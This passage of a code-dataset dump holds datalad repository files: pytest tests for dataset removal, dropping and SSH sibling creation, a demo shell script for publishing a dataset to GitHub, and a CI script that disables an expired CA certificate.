arbitrary\n character to decide replacement.\n\n Returns\n -------\n str\n \"\"\"\n\n for regexp, replacement in get_replacement_dict(rules).items():\n s = re.sub(regexp, replacement, s)\n\n return s\n" }, { "alpha_fraction": 0.6330274939537048, "alphanum_fraction": 0.6330274939537048, "avg_line_length": 27.4761905670166, "blob_id": "5e6ccd3439d238c0cacd36c63e081ce49e922d06", "content_id": "044647458f781ce14e27ca974b5aab9ad5f702ca", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1199, "license_type": "permissive", "max_line_length": 73, "num_lines": 42, "path": "/datalad/cli/tests/test_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import sys\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom datalad.tests.utils_pytest import (\n eq_,\n ok_,\n)\nfrom datalad.utils import (\n swallow_logs,\n swallow_outputs,\n)\n\nfrom ..utils import setup_exceptionhook\n\n\[email protected](\"interactive\", [True, False])\ndef test_setup_exceptionhook(interactive):\n old_exceptionhook = sys.excepthook\n\n post_mortem_tb = []\n\n def our_post_mortem(tb):\n post_mortem_tb.append(tb)\n\n with patch('sys.excepthook'), \\\n patch('datalad.utils.is_interactive', lambda: interactive), \\\n patch('pdb.post_mortem', our_post_mortem):\n setup_exceptionhook()\n our_exceptionhook = sys.excepthook\n ok_(old_exceptionhook != our_exceptionhook)\n with swallow_logs() as cml, swallow_outputs() as cmo:\n # we need to call our_exceptionhook explicitly b/c nose\n # swallows all Exceptions and hook never gets executed\n try:\n raise RuntimeError\n except Exception as e: # RuntimeError:\n type_, value_, tb_ = sys.exc_info()\n our_exceptionhook(type_, value_, tb_)\n\n eq_(old_exceptionhook, sys.excepthook)\n\n\n\n" }, { "alpha_fraction": 0.6142985224723816, "alphanum_fraction": 0.617679238319397, "avg_line_length": 34.041812896728516, "blob_id": "77e8398e992a87f1fface58e43b3b7ada2ff1231", "content_id": "c9a7c16bdca54f3f66234d011f99253df12e41ee", "detected_licenses": [ "LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10057, "license_type": "permissive", "max_line_length": 82, "num_lines": 287, "path": "/datalad/local/tests/test_remove.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test remove command\"\"\"\n\nimport os.path as op\n\nfrom datalad.api import (\n clone,\n remove,\n)\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.tests.utils_pytest import (\n assert_in,\n assert_in_results,\n assert_not_in,\n assert_not_in_results,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n chpwd,\n create_tree,\n eq_,\n get_deeply_nested_structure,\n nok_,\n ok_,\n with_tempfile,\n with_tree,\n)\n\n\n@with_tempfile\ndef test_remove(path=None):\n # see docstring for test data structure\n ds = get_deeply_nested_structure(path)\n gitfile = op.join(\"subdir\", \"git_file.txt\")\n\n ok_((ds.pathobj / gitfile).exists())\n res = ds.remove(gitfile, drop='all')\n assert_result_count(res, 3)\n # git file needs no dropping\n assert_in_results(\n res,\n action='drop',\n path=str(ds.pathobj / gitfile),\n status='notneeded',\n type='file',\n )\n # removed from working tree\n assert_in_results(\n res,\n action='remove',\n path=str(ds.pathobj / gitfile),\n status='ok',\n type='file',\n )\n # saved removal in dataset\n assert_in_results(\n res,\n action='save',\n path=ds.path,\n type='dataset',\n status='ok',\n )\n nok_((ds.pathobj / gitfile).exists())\n\n # now same for an annexed files\n annexedfile = op.join(\"subdir\", \"annexed_file.txt\")\n # drop failure prevents removal\n res = ds.remove(annexedfile, drop='all', on_failure='ignore')\n assert_result_count(res, 1)\n assert_in_results(res, status='error', action='drop',\n path=str(ds.pathobj / annexedfile))\n ok_((ds.pathobj / annexedfile).exists())\n\n # now remove the file, but actually not drop the underlying\n # key -- hence no availability loss -- default mode of operation\n # remember the key\n key = ds.repo.get_file_annexinfo(annexedfile)['key']\n res = ds.remove(annexedfile, drop='datasets',\n message=\"custom msg\",\n on_failure='ignore')\n # removal and dataset save\n assert_result_count(res, 2)\n eq_(\n ds.repo.format_commit(\n \"%B\",\n ds.repo.get_corresponding_branch()).rstrip(),\n \"custom msg\")\n assert_in_results(res, action='remove', status='ok',\n path=str(ds.pathobj / annexedfile))\n assert_not_in_results(res, action='drop')\n nok_((ds.pathobj / annexedfile).exists())\n res = ds.repo.call_annex_records(['whereis', '--key', key, '--json'])\n assert_in_results(res, key=key, success=True)\n\n # now remove entire directory\n res = ds.remove('subdir', on_failure='ignore')\n assert_in_results(res, status='impossible', state='untracked')\n ok_((ds.pathobj / 'subdir').exists())\n\n ds.save('subdir')\n res = ds.remove('subdir', on_failure='ignore')\n assert_in_results(res, status='ok', action='remove')\n assert_in_results(res, status='ok', action='save', type='dataset')\n nok_((ds.pathobj / 'subdir').exists())\n\n # now remove an entire subdataset\n # prep: make clean\n rmdspath = ds.pathobj / 'subds_modified' / 'subds_lvl1_modified'\n ds.save(rmdspath, recursive=True)\n res = ds.remove(rmdspath, on_failure='ignore')\n # unique dataset, with unique keys -- must fail\n assert_in_results(res, status='error', action='uninstall', path=str(rmdspath))\n\n # go reckless\n assert_in(str(rmdspath),\n ds.subdatasets(path='subds_modified',\n recursive=True,\n result_xfm='paths',\n result_renderer='disabled'))\n res = ds.remove(rmdspath, reckless='availability', on_failure='ignore')\n assert_status('ok', res)\n assert_in_results(res, action='uninstall', path=str(rmdspath))\n assert_in_results(res, action='remove', path=str(rmdspath))\n nok_(rmdspath.exists())\n # properly unlinked\n assert_not_in(str(rmdspath),\n ds.subdatasets(path='subds_modified',\n recursive=True,\n result_xfm='paths',\n result_renderer='disabled'))\n\n # lastly, remove an uninstalled subdataset\n # we save all to be able to check whether removal was committed and\n # the ds is clean at the end\n ds.save()\n # uninstall, we don't care about the existing modifications here\n res = ds.drop('subds_modified', what='all',\n reckless='kill', recursive=True)\n # even remove the empty mount-point, such that is is invisible on the\n # file system\n (ds.pathobj / 'subds_modified').rmdir()\n res = ds.remove('subds_modified', on_failure='ignore')\n assert_in_results(\n res, action='remove', path=str(ds.pathobj / 'subds_modified'))\n # removal was committed\n assert_repo_status(ds.path)\n\n # and really finally, removing top-level is just a drop\n res = ds.remove(reckless='kill')\n assert_in_results(res, action='uninstall', path=ds.path, status='ok')\n nok_(ds.is_installed())\n\n\n@with_tempfile\ndef test_remove_subdataset_nomethod(path=None):\n ds = Dataset(path).create()\n ds.create('subds')\n with chpwd(path):\n # fails due to unique state\n res = remove('subds', on_failure='ignore')\n assert_in_results(res, action='uninstall', status='error', type='dataset')\n res = remove('subds', reckless='availability', on_failure='ignore')\n assert_in_results(res, action='uninstall', status='ok', type='dataset')\n assert_in_results(res, action='remove', status='ok')\n assert_in_results(res, action='save', status='ok')\n\n\n@with_tempfile()\ndef test_remove_uninstalled(path=None):\n ds = Dataset(path)\n assert_raises(ValueError, ds.remove)\n\n\n@with_tempfile()\ndef test_remove_nowhining(path=None):\n # when removing a dataset under a dataset (but not a subdataset)\n # should not provide a meaningless message that something was not right\n ds = Dataset(path).create()\n # just install/clone inside of it\n subds_path = ds.pathobj / 'subds'\n clone(path=subds_path, source=path)\n remove(dataset=subds_path) # should remove just fine\n\n\n@with_tempfile()\ndef test_remove_recreation(path=None):\n # test recreation is possible and doesn't conflict with in-memory\n # remainings of the old instances\n # see issue #1311\n ds = Dataset(path).create()\n ds.remove(reckless='availability')\n ds = Dataset(path).create()\n assert_repo_status(ds.path)\n ok_(ds.is_installed())\n\n\n@with_tree({'one': 'one', 'two': 'two', 'three': 'three'})\ndef test_remove_more_than_one(path=None):\n ds = Dataset(path).create(force=True)\n ds.save()\n assert_repo_status(path)\n # ensure #1912 stays resolved\n ds.remove(['one', 'two'], reckless='availability')\n assert_repo_status(path)\n\n\n@with_tempfile()\ndef test_no_interaction_with_untracked_content(path=None):\n # extracted from what was a metadata test originally\n ds = Dataset(op.join(path, 'origin')).create(force=True)\n create_tree(ds.path, {'sub': {'subsub': {'dat': 'lots of data'}}})\n subds = ds.create('sub', force=True)\n subds.remove(op.join('.datalad', 'config'))\n nok_((subds.pathobj / '.datalad' / 'config').exists())\n # this will only work, if `remove` didn't do anything stupid and\n # caused all content to be saved\n subds.create('subsub', force=True)\n\n\n@with_tempfile()\ndef test_kill(path=None):\n # nested datasets with load\n ds = Dataset(path).create()\n (ds.pathobj / 'file.dat').write_text('load')\n ds.save(\"file.dat\")\n subds = ds.create('deep1')\n eq_(sorted(ds.subdatasets(result_xfm='relpaths')), ['deep1'])\n assert_repo_status(ds.path)\n\n # and we fail to remove for many reasons\n # - unpushed commits\n # - a subdataset present\n # - unique annex key\n res = ds.remove(on_failure='ignore')\n assert_result_count(\n res, 1,\n status='error', path=ds.path)\n eq_(ds.remove(reckless='availability',\n result_xfm='datasets'),\n [subds, ds])\n nok_(ds.pathobj.exists())\n\n\n@with_tempfile()\ndef test_clean_subds_removal(path=None):\n ds = Dataset(path).create()\n subds1 = ds.create('one')\n subds2 = ds.create('two')\n eq_(sorted(ds.subdatasets(result_xfm='relpaths')), ['one', 'two'])\n assert_repo_status(ds.path)\n # now kill one\n res = ds.remove('one', reckless='availability', result_xfm=None)\n # subds1 got uninstalled, and ds got the removal of subds1 saved\n assert_result_count(res, 1, path=subds1.path, action='uninstall', status='ok')\n assert_result_count(res, 1, path=subds1.path, action='remove', status='ok')\n assert_result_count(res, 1, path=ds.path, action='save', status='ok')\n ok_(not subds1.is_installed())\n assert_repo_status(ds.path)\n # two must remain\n eq_(ds.subdatasets(result_xfm='relpaths'), ['two'])\n # one is gone\n nok_(subds1.pathobj.exists())\n # and now again, but this time remove something that is not installed\n ds.create('three')\n eq_(sorted(ds.subdatasets(result_xfm='relpaths')), ['three', 'two'])\n ds.drop('two', what='all', reckless='availability')\n assert_repo_status(ds.path)\n eq_(sorted(ds.subdatasets(result_xfm='relpaths')), ['three', 'two'])\n nok_(subds2.is_installed())\n # oderly empty mountpoint is maintained\n ok_(subds2.pathobj.exists())\n res = ds.remove('two', reckless='availability')\n assert_in_results(\n res,\n path=str(ds.pathobj / 'two'),\n action='remove')\n assert_repo_status(ds.path)\n # subds2 was already uninstalled, now ds got the removal of subds2 saved\n nok_(subds2.pathobj.exists())\n eq_(ds.subdatasets(result_xfm='relpaths'), ['three'])\n" }, { "alpha_fraction": 0.7673282623291016, "alphanum_fraction": 0.770076334476471, "avg_line_length": 67.22916412353516, "blob_id": "e4ee217955126efbd7cc9b91df9117b1c61a95ba", "content_id": "e8e93939640e8c85f0f75b8c363ce7ac0bc1e8da", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3275, "license_type": "permissive", "max_line_length": 412, "num_lines": 48, "path": "/docs/casts/publish_on_github.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# this cast requires the ability to create 'datalad/publish-demo' on Github (must not exist yet)\n# it also require SSH access to the URL demo.datalad.org (can be localhost)\n\nsay \"Sharing is best done on a platform that many people visit. One of them is GitHub.\"\nsay \"However, Git is not designed to handle large data files directly, and GitHub will refuse large files\"\nsay \"One can either use GitHub's own LFS tool ... or use DataLad to flexibly combine many possible data hosting solutions with a repository hosted on GitHub\"\nsay \"Here is how this looks...\"\n\nsay \"It starts with a dataset. We give it a description to more easily keep track of where data are.\"\nrun \"datalad create demo --description \\\"original dataset location\\\"\"\nrun \"cd demo\"\n\nsay \"For this demo, we are generating a large (600MB file) comprised of random data. A file of this size cannot be hosted on GitHub directly.\"\nrun \"datalad run dd if=/dev/urandom of=big.dat bs=1M count=600\"\n\nsay \"Publishing this dataset in a way that allows anyone to simply install it from GitHub, AND get the big data file, requires two steps\"\nsay \"1. Host the data file at some publicly accessible location\"\nsay \"2. Configure DataLad to make sure that getting data from GitHub transparently requests from this other location instead\"\n\nsay \"Here we use a personal webserver with SSH access, but, in principle, any hosting solution supported by git-annex is equally suitable\"\nsay \"We create a remote sibling of our dataset under the name 'myserver' via SSH, and tell datalad to track it as a common data source that is available for any future installation of this dataset. Access to this location will happen via the given http:// URL, and --ui true tells to install DataLad web UI as on https://datasets.datalad.org. Note that /.git in the URL most likely to be necessary in your case.\"\nrun \"datalad create-sibling -s myserver demo.datalad.org:public_html/publish-demo --ui true --as-common-datasrc demo-server --target-url http://demo.datalad.org/publish-demo/.git\"\n\nsay \"With this configuration in place, we can now create a repository on GitHub, and configure the remote sibling on the SSH server as a publication dependency\"\nrun \"datalad create-sibling-github --github-organization datalad --publish-depends myserver --access-protocol ssh publish-demo\"\n\nsay \"Let's quickly recap that the data file is just in our local dataset\"\nrun \"git annex whereis\"\n\nsay \"From now on, we can simply 'publish to GitHub' and DataLad will take care of the rest\"\nrun \"datalad publish --to github --transfer-data all\"\n\nsay \"We can confirm that our data file ended up on our server\"\nrun \"git annex whereis big.dat\"\n\nsay \"Now we simulate how it would look for a random person to obtain the data in this dataset from GitHub -- by installing into a new location, straight from GitHub (this does not require a GitHub account)\"\nrun \"cd ../\"\nrun \"datalad install -s [email protected]:datalad/publish-demo.git fromgh\"\nrun \"cd fromgh\"\n\nsay \"This dataset does not know how to access the original dataset location, only GitHub and our server\"\nrun \"git remote -v\"\n\nsay \"There is no further setup necessary, anyone can get the data -- if they have permission to access the URL of our own server\"\nrun \"datalad get big.dat\"\nrun \"ls -sLh big.dat\"\n\nsay \"Go publish!\"\n" }, { "alpha_fraction": 0.5754716992378235, "alphanum_fraction": 0.5786163806915283, "avg_line_length": 31.89655113220215, "blob_id": "0e9bd3502cd1a3d48b732876a59c80b5e78c0fd1", "content_id": "ca4fcd9e3b009e7180947170e15c66a5a7110d8a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 954, "license_type": "permissive", "max_line_length": 79, "num_lines": 29, "path": "/datalad/distribution/tests/test_drop.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test drop command\n\"\"\"\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.exceptions import IncompleteResultsError\nfrom datalad.tests.utils_pytest import (\n assert_in,\n assert_raises,\n assert_status,\n with_tree,\n)\n\n\n@with_tree({\"foo\": \"foo\"})\ndef test_drop_file_need_nocheck(path=None):\n ds = Dataset(path).create(force=True)\n ds.save()\n with assert_raises(IncompleteResultsError) as cme:\n ds.drop(\"foo\")\n # The --force suggestion from git-annex-drop is translated to --reckless.\n assert_in(\"--reckless\", str(cme.value))\n assert_status(\"ok\", ds.drop(\"foo\", reckless='kill', on_failure=\"ignore\"))\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.7099999785423279, "avg_line_length": 32.33333206176758, "blob_id": "484905b2da179a1e9a63336f0e74443c242b8714", "content_id": "64a739fc8b91c6a8bdd27cb121cccb508760cbe0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 300, "license_type": "permissive", "max_line_length": 86, "num_lines": 9, "path": "/tools/ci/debians_disable_outdated_ssl_cert", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# \"Recipe\" from https://superuser.com/a/1679332 (thanks @jwodder)\n# to mitigate https://github.com/datalad/datalad/issues/6026\n\nif hash update-ca-certificates; then\n sudo sed -i -e 's,^\\(mozilla/DST_Root_CA_X3.crt\\),!\\1,g' /etc/ca-certificates.conf\n sudo update-ca-certificates\nfi\n" }, { "alpha_fraction": 0.6184271574020386, "alphanum_fraction": 0.6234973669052124, "avg_line_length": 37.05497741699219, "blob_id": "7f39f5537504d65b564ce2699bb7f1ad7d02886a", "content_id": "02cb13589b7d4f3dd7dde690f50094b94b8bf591", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 36685, "license_type": "permissive", "max_line_length": 117, "num_lines": 964, "path": "/datalad/distribution/tests/test_create_sibling.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test create publication target ssh web server action\n\n\"\"\"\n\nimport logging\nimport os\nimport stat\nimport sys\nfrom os import chmod\nfrom os.path import (\n basename,\n exists,\n)\nfrom os.path import join as opj\n\nimport pytest\n\nfrom datalad.api import (\n create_sibling,\n install,\n push,\n)\nfrom datalad.cmd import StdOutErrCapture\nfrom datalad.cmd import WitlessRunner as Runner\nfrom datalad.distribution.create_sibling import _RunnerAdapter\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n CommandError,\n InsufficientArgumentsError,\n)\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.network import urlquote\nfrom datalad.tests.utils_testdatasets import _mk_submodule_annex\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n DEFAULT_REMOTE,\n SkipTest,\n assert_dict_equal,\n assert_false,\n assert_in,\n assert_in_results,\n assert_no_errors_logged,\n assert_not_equal,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n create_tree,\n eq_,\n get_mtimes_and_digests,\n get_ssh_port,\n known_failure_windows,\n ok_,\n ok_endswith,\n ok_file_has_content,\n ok_file_under_git,\n skip_if_on_windows,\n skip_if_root,\n skip_ssh,\n slow,\n swallow_logs,\n with_tempfile,\n with_testsui,\n)\nfrom datalad.utils import (\n Path,\n _path_,\n chpwd,\n on_windows,\n)\n\nfrom ..dataset import Dataset\n\nlgr = logging.getLogger('datalad.tests')\n\n\n_have_webui = None\n\n\ndef have_webui():\n \"\"\"Helper for a delayed import test to break circular imports from\n deprecated extension, which gets its tests from the module too\n \"\"\"\n global _have_webui\n if _have_webui is not None:\n return _have_webui\n\n try:\n import datalad_deprecated.sibling_webui\n from datalad_deprecated.tests.test_create_sibling_webui import (\n assert_publish_with_ui,\n )\n _have_webui = True\n except (ModuleNotFoundError, ImportError):\n _have_webui = False\n return _have_webui\n\n\nif lgr.getEffectiveLevel() > logging.DEBUG:\n assert_create_sshwebserver = assert_no_errors_logged(create_sibling)\nelse:\n assert_create_sshwebserver = create_sibling\n\n\ndef assert_postupdate_hooks(path, installed=True, flat=False):\n \"\"\"\n Verify that post-update hook was installed (or not, if installed=False)\n \"\"\"\n from glob import glob\n if flat:\n # there is no top level dataset\n datasets = glob(opj(path, '*'))\n else:\n ds = Dataset(path)\n datasets = [ds.path] + ds.subdatasets(result_xfm='paths', recursive=True, state='present')\n for ds_ in datasets:\n ds_ = Dataset(ds_)\n hook_path = opj(ds_.path, '.git', 'hooks', 'post-update')\n if installed:\n ok_(os.path.exists(hook_path),\n msg=\"Missing %s\" % hook_path)\n else:\n ok_(not os.path.exists(hook_path),\n msg=\"%s exists when it shouldn't\" % hook_path)\n\n\n@with_tempfile(mkdir=True)\ndef test_invalid_call(path=None):\n with chpwd(path):\n # ^ Change directory so that we don't fail with an\n # InvalidGitRepositoryError if the test is executed from a git\n # worktree.\n\n # needs a SSH URL\n assert_raises(InsufficientArgumentsError, create_sibling, '')\n assert_raises(ValueError, create_sibling, 'http://ignore.me')\n # needs an actual dataset\n assert_raises(\n ValueError,\n create_sibling, 'datalad-test:/tmp/somewhere', dataset='/nothere')\n # pre-configure a bogus remote\n ds = Dataset(path).create()\n ds.repo.add_remote('bogus', 'http://bogus.url.com')\n # fails to reconfigure by default with generated\n # and also when given an existing name\n for res in (ds.create_sibling('bogus:/tmp/somewhere', on_failure='ignore'),\n ds.create_sibling('datalad-test:/tmp/somewhere', name='bogus', on_failure='ignore')):\n assert_result_count(\n res, 1,\n status='error',\n message=(\n \"sibling '%s' already configured (specify alternative name, or force reconfiguration via --existing\",\n 'bogus'))\n\n if not have_webui():\n # need an extension package\n assert_raises(RuntimeError, ds.create_sibling, '', ui=True)\n\n\n@slow # 26sec on travis\n@skip_if_on_windows # create_sibling incompatible with win servers\n@skip_ssh\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_target_ssh_simple(origin=None, src_path=None, target_rootpath=None):\n ca = dict(result_renderer='disabled')\n test_fname = 'test-annex.dat'\n orig = Dataset(origin).create(**ca)\n (orig.pathobj / test_fname).write_text('some')\n orig.save(**ca)\n\n port = get_ssh_port(\"datalad-test\")\n # prepare src\n source = install(\n src_path, source=origin,\n result_xfm='datasets', return_type='item-or-list')\n\n target_path = opj(target_rootpath, \"basic\")\n with swallow_logs(new_level=logging.ERROR) as cml:\n create_sibling(\n dataset=source,\n name=\"local_target\",\n sshurl=\"ssh://datalad-test:{}\".format(port),\n target_dir=target_path,\n ui=have_webui())\n assert_not_in('enableremote local_target failed', cml.out)\n\n target_gitrepo = GitRepo(target_path, create=False) # raises if not a git repo\n assert_in(\"local_target\", source.repo.get_remotes())\n # Both must be annex or git repositories\n src_is_annex = AnnexRepo.is_valid_repo(src_path)\n eq_(src_is_annex, AnnexRepo.is_valid_repo(target_path))\n # And target one should be known to have a known UUID within the source if annex\n if src_is_annex:\n lclcfg = AnnexRepo(src_path).config\n target_aversion = target_gitrepo.config['annex.version']\n # basic config in place\n eq_(lclcfg.get('remote.local_target.annex-ignore'), 'false')\n ok_(lclcfg.get('remote.local_target.annex-uuid'))\n\n # do it again without force, but use a different name to avoid initial checks\n # for existing remotes:\n with assert_raises(RuntimeError) as cm:\n assert_create_sshwebserver(\n dataset=source,\n name=\"local_target_alt\",\n sshurl=\"ssh://datalad-test\",\n target_dir=target_path)\n ok_(str(cm.value).startswith(\n \"Target path %s already exists.\" % target_path))\n if src_is_annex:\n # Before we \"talk\" to it with git-annex directly -- we must prevent auto-upgrades\n # since the git-annex on \"remote server\" (e.g. docker container) could be outdated\n # and not support new git-annex repo version\n target_gitrepo.config.set('annex.autoupgraderepository', \"false\", scope='local')\n try:\n target_description = AnnexRepo(target_path, create=False).get_description()\n except CommandError as e:\n if 'is at unsupported version' not in str(e.stderr):\n raise\n # we just would skip this part of the test and avoid future similar query\n target_description = None\n else:\n assert target_gitrepo.config['annex.version'] == target_aversion\n assert_not_equal(target_description, None)\n assert_not_equal(target_description, target_path)\n # on yoh's laptop TMPDIR is under HOME, so things start to become\n # tricky since then target_path is shortened and we would need to know\n # remote $HOME. To not over-complicate and still test, test only for\n # the basename of the target_path\n ok_endswith(target_description, basename(target_path))\n # now, with force and correct url, which is also used to determine\n # target_dir\n # Note: on windows absolute path is not url conform. But this way it's easy\n # to test, that ssh path is correctly used.\n if not on_windows:\n # add random file under target_path, to explicitly test existing=replace\n open(opj(target_path, 'random'), 'w').write('123')\n\n @with_testsui(responses=[\"yes\"])\n def interactive_assert_create_sshwebserver():\n assert_create_sshwebserver(\n dataset=source,\n name=\"local_target\",\n sshurl=\"ssh://datalad-test\" + target_path,\n publish_by_default=DEFAULT_BRANCH,\n existing='replace',\n ui=have_webui(),\n )\n interactive_assert_create_sshwebserver()\n\n eq_(\"ssh://datalad-test\" + urlquote(target_path),\n source.repo.get_remote_url(\"local_target\"))\n ok_(source.repo.get_remote_url(\"local_target\", push=True) is None)\n\n # ensure target tree actually replaced by source\n assert_false(exists(opj(target_path, 'random')))\n\n if src_is_annex:\n lclcfg = AnnexRepo(src_path).config\n eq_(lclcfg.get('remote.local_target.annex-ignore'), 'false')\n # valid uuid\n eq_(lclcfg.get('remote.local_target.annex-uuid').count('-'), 4)\n # should be added too, even if URL matches prior state\n eq_(lclcfg.get('remote.local_target.push'), DEFAULT_BRANCH)\n\n # again, by explicitly passing urls. Since we are on datalad-test, the\n # could use local path, but then it would not use \"remote\" git-annex\n # and thus potentially lead to incongruent result. So make URLs a bit\n # different by adding trailing /. to regular target_url\n target_url = \"ssh://datalad-test\" + target_path + \"/.\"\n cpkwargs = dict(\n dataset=source,\n name=\"local_target\",\n sshurl=\"ssh://datalad-test\",\n target_dir=target_path,\n target_url=target_url,\n target_pushurl=\"ssh://datalad-test\" + target_path,\n ui=have_webui(),\n )\n\n @with_testsui(responses=['yes'])\n def interactive_assert_create_sshwebserver():\n assert_create_sshwebserver(existing='replace', **cpkwargs)\n interactive_assert_create_sshwebserver()\n\n if src_is_annex and target_description:\n target_description = AnnexRepo(target_path,\n create=False).get_description()\n eq_(target_description, target_url)\n\n eq_(target_url,\n source.repo.get_remote_url(\"local_target\"))\n eq_(\"ssh://datalad-test\" + target_path,\n source.repo.get_remote_url(\"local_target\", push=True))\n\n if have_webui():\n from datalad_deprecated.tests.test_create_sibling_webui import (\n assert_publish_with_ui,\n )\n assert_publish_with_ui(target_path)\n\n # now, push should work:\n push(dataset=source, to=\"local_target\")\n\n # and we should be able to 'reconfigure'\n def process_digests_mtimes(digests, mtimes):\n # it should have triggered a hook, which would have created log and metadata files\n check_metadata = False\n for part in 'logs', 'metadata':\n metafiles = [k for k in digests if k.startswith(_path_('.git/datalad/%s/' % part))]\n # This is in effect ONLY if we have \"compatible\" datalad installed on remote\n # end. ATM we don't have easy way to guarantee that AFAIK (yoh),\n # so let's not check/enforce (TODO)\n # assert(len(metafiles) >= 1) # we might have 2 logs if timestamps do not collide ;)\n # Let's actually do it to some degree\n if part == 'logs':\n # always should have those:\n assert (len(metafiles) >= 1)\n with open(opj(target_path, metafiles[0])) as f:\n if 'no datalad found' not in f.read():\n check_metadata = True\n if part == 'metadata':\n eq_(len(metafiles), bool(check_metadata))\n for f in metafiles:\n digests.pop(f)\n mtimes.pop(f)\n # and just pop some leftovers from annex\n # and ignore .git/logs content (gh-5298)\n for f in list(digests):\n if f.startswith('.git/annex/mergedrefs') \\\n or f.startswith('.git/logs/'):\n digests.pop(f)\n mtimes.pop(f)\n\n if not have_webui():\n # the rest of the test assumed that we have uploaded a UI\n return\n orig_digests, orig_mtimes = get_mtimes_and_digests(target_path)\n process_digests_mtimes(orig_digests, orig_mtimes)\n\n import time\n time.sleep(0.1) # just so that mtimes change\n assert_create_sshwebserver(existing='reconfigure', **cpkwargs)\n digests, mtimes = get_mtimes_and_digests(target_path)\n process_digests_mtimes(digests, mtimes)\n\n assert_dict_equal(orig_digests, digests) # nothing should change in terms of content\n\n # but some files should have been modified\n modified_files = {k for k in mtimes if orig_mtimes.get(k, 0) != mtimes.get(k, 0)}\n # collect which files were expected to be modified without incurring any changes\n ok_modified_files = {\n _path_('.git/hooks/post-update'), 'index.html',\n }\n ok_modified_files.add(_path_('.git/config'))\n ok_modified_files.update({f for f in digests if f.startswith(_path_('.git/datalad/web'))})\n # it seems that with some recent git behavior has changed a bit\n # and index might get touched\n if _path_('.git/index') in modified_files:\n ok_modified_files.add(_path_('.git/index'))\n ok_(modified_files.issuperset(ok_modified_files))\n\n\n@slow # 53.8496s\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile\ndef check_target_ssh_recursive(use_ssh, origin, src_path, target_path):\n _mk_submodule_annex(origin, 'test-annex.dat', 'whatever')\n\n # prepare src\n source = install(src_path, source=origin, recursive=True)\n\n sub1 = Dataset(opj(src_path, \"subm 1\"))\n sub2 = Dataset(opj(src_path, \"2\"))\n\n for flat in False, True:\n target_path_ = target_dir_tpl = target_path + \"-\" + str(flat)\n\n if flat:\n target_dir_tpl += \"/prefix%RELNAME\"\n sep = '-'\n else:\n sep = os.path.sep\n\n if use_ssh:\n sshurl = \"ssh://datalad-test\" + target_path_\n else:\n sshurl = target_path_\n\n remote_name = 'remote-' + str(flat)\n with chpwd(source.path):\n assert_create_sshwebserver(\n name=remote_name,\n sshurl=sshurl,\n target_dir=target_dir_tpl,\n recursive=True,\n ui=have_webui())\n\n # raise if git repos were not created\n for suffix in [sep + 'subm 1', sep + '2', '']:\n target_dir = opj(target_path_, 'prefix' if flat else \"\").rstrip(os.path.sep) + suffix\n # raise if git repos were not created\n GitRepo(target_dir, create=False)\n\n if have_webui():\n from datalad_deprecated.tests.test_create_sibling_webui import (\n assert_publish_with_ui,\n )\n assert_publish_with_ui(target_dir, rootds=not suffix, flat=flat)\n\n for repo in [source.repo, sub1.repo, sub2.repo]:\n assert_not_in(\"local_target\", repo.get_remotes())\n\n # now, push should work:\n push(dataset=source, to=remote_name)\n\n # verify that we can create-sibling which was created later and possibly\n # first published in super-dataset as an empty directory\n sub3_name = 'subm 3-%s' % flat\n sub3 = source.create(sub3_name)\n # since is an empty value to force it to consider all changes since we published\n # already\n with chpwd(source.path):\n # as we discussed in gh-1495 we use the last-published state of the base\n # dataset as the indicator for modification detection with since='^'\n # hence we must not publish the base dataset on its own without recursion,\n # if we want to have this mechanism do its job\n #push(to=remote_name) # no recursion\n out1 = assert_create_sshwebserver(\n name=remote_name,\n sshurl=sshurl,\n target_dir=target_dir_tpl,\n recursive=True,\n existing='skip',\n ui=have_webui(),\n since='^'\n )\n assert_postupdate_hooks(target_path_, installed=have_webui(), flat=flat)\n assert_result_count(out1, 1, status='ok', sibling_name=remote_name)\n\n # 